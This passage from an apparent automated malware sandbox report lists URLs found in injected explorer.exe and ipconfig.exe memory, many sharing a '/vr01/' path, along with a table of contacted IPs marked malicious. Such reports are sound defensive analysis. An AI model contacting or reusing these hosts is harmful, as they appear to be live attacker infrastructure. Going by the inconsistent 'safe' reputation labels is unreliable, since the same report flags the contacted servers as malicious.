                                              http://www.accidentapp.onlineexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.laneflowlogistics.com/vr01/www.familyofficesheet.comexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.kirtirefrigeration.com/vr01/explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.laneflowlogistics.com/vr01/explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.familyofficesheet.com/vr01/www.mayorii.comexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.gratiasempirellc.com/vr01/explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000002.00000003.3096071926.000000000C50F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4454886902.000000000C510000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780399973.000000000C50F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2005015223.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.gratiasempirellc.com/xmlrpc.php?rsdexplorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.makeyousurprise.comReferer:explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.michellecaldwelldesign.com/vr01/www.accidentapp.onlineexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://wns.windows.com/)sexplorer.exe, 00000002.00000000.1998453035.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4451988670.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000002.4455332318.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096004906.000000000C85F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2005546585.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.nicholsonflooringservices.comexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.helyibudapest.comexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.makeyousurprise.comexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: phishing
                                                    		unknown
                                                    http://www.yesxoit.xyz/vr01/explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.topdeals.bizReferer:explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://api.w.org/explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpfalse
                                                      		high
                                                      http://www.yoursweets.onlineReferer:explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.bharatcrimecontrol24news.comReferer:explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.yesxoit.xyzReferer:explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.gratiasempirellc.com/wp-json/explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.flavorfog.onlineReferer:explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://outlook.comexplorer.exe, 00000002.00000003.3779046751.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094901918.0000000009BAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094735270.0000000009B85000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4452831874.0000000009C96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1998453035.0000000009B8A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.gratiasempirellc.com/wp-content/themes/business-identity-mvp/style.css?ver=6.4.3explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.laneflowlogistics.comexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.mayorii.com/vr01/www.flavorfog.onlineexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.bharatcrimecontrol24news.comexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.gratiasempirellc.com/vr01/www.laneflowlogistics.comexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.nicholsonflooringservices.com/vr01/www.hsyxkj.comexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.mayorii.comReferer:explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.kirtirefrigeration.comexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.topdeals.biz/vr01/www.michellecaldwelldesign.comexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://android.notify.windows.com/iOSexplorer.exe, 00000002.00000000.1994801802.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.accidentapp.online/vr01/explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.gratiasempirellc.comexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.mayorii.com/vr01/explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.familyofficesheet.comReferer:explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.kirtirefrigeration.comReferer:explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.helyibudapest.com/vr01/explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.gratiasempirellc.com/feedexplorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.bharatcrimecontrol24news.com/vr01/www.kirtirefrigeration.comexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.hsyxkj.com/vr01/explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://api.msn.com/explorer.exe, 00000002.00000002.4451988670.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1998453035.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.makeyousurprise.com/vr01/explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: phishing
                                                            		unknown
                                                            http://www.kirtirefrigeration.com/vr01/www.topdeals.bizexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://crl.vexplorer.exe, 00000002.00000002.4446973075.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1992382164.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.nicholsonflooringservices.com/vr01/explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            35.214.118.179
                                                            		www.flavorfog.onlineUnited States
                                                            		19527GOOGLE-2UStrue
                                                            76.223.105.230
                                                            		laneflowlogistics.comUnited States
                                                            		16509AMAZON-02UStrue
                                                            45.88.201.15
                                                            		gratiasempirellc.comSwitzerland
                                                            		54574DMITUStrue
                                                            34.149.87.45
                                                            		td-ccm-neg-87-45.wixdns.netUnited States
                                                            		2686ATGS-MMD-ASUStrue
                                                            104.16.36.105
                                                            		www.familyofficesheet.comUnited States
                                                            		13335CLOUDFLARENETUStrue
                                                            3.33.130.190
                                                            		accidentapp.onlineUnited States
                                                            		8987AMAZONEXPANSIONGBtrue
